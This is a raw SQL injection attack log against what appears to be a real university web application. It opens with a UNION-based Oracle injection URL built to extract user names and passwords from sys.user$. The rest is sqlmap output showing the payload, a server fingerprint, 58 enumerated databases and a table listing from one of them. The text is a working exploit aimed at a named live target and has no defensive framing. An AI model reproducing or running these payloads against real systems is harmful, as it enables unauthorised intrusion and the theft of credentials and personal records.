http://bszs.hainu.edu.cn/readDetail.aspx?id=-1361' UNION ALL SELECT null,(select wm_concat(name||'~~ '||password||'<br> ') from sys.user$),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
Parameter: id Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-1361' UNION ALL SELECT NULL,CHR(113)||CHR(107)||CHR(104)||CHR(98)||CHR(113)||CHR(79)||CHR(113)||CHR(82)||CHR(98)||CHR(79)||CHR(89)||CHR(120)||CHR(65)||CHR(110)||CHR(117)||CHR(113)||CHR(109)||CHR(99)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- --- web server operating system: Windows 2003 or XP web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: Oracle available databases [58]: [*] BSYJSZSXT [*] CBMS [*] CTXSYS [*] DBBAK [*] DBSNMP [*] DMSYS [*] DYYMZXT [*] EXFSYS [*] HNDXHRM [*] HNDXZFDXC [*] HNDZHDC [*] HRM2ADMIN [*] HSBSYJSZSXT [*] JCZX [*] JWCXXT [*] JWSEARCH [*] LSK_ZFXFZB [*] LXXT [*] MDSYS [*] MHXT [*] OA [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] PORTAL [*] SCOTT [*] SFXT [*] STKSCXT [*] SYS [*] SYSMAN [*] SYSTEM [*] TSGZZLX [*] TSMSYS [*] TYMHDLXT [*] VERIFY [*] WMSYS [*] WNMS [*] XDB [*] XGXT [*] XSGZGL [*] YJSJW [*] YJSJWGL [*] YJSJWXT [*] YJSLQXXBDY [*] YJSTEST [*] YJSXT [*] YXXT [*] ZFDXC [*] ZFDXCTEST [*] ZFIM [*] ZFIMN [*] ZFOA [*] ZFSEARCH [*] ZFSMP [*] ZFSOFT_ZFIM [*] ZFSOFT_ZFSMP [*] ZFSOFT_ZFSNS [*] ZFXFZB sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-1361' UNION ALL SELECT NULL,CHR(113)||CHR(107)||CHR(104)||CHR(98)||CHR(113)||CHR(79)||CHR(113)||CHR(82)||CHR(98)||CHR(79)||CHR(89)||CHR(120)||CHR(65)||CHR(110)||CHR(117)||CHR(113)||CHR(109)||CHR(99)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- --- web server operating system: Windows 2003 or XP web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: Oracle Database: YJSJWXT [403 tables] +-----------------------+ | 2006XSJBXXB | | BDJZQKB | | BJDMB | | BJGMDB | | BJPXXB | | BKLBDMB | | BKSJB | | BSS2009 | | BSSXX2009 | | BSWBJBXXB | | BSWBZPB | | BYSFZXXB | | BYSXSJBXXB | | BYYQBZB | | CDDMB | | CFLXDMB | | CJB | | CJDBWYHCYXXB | ........ .......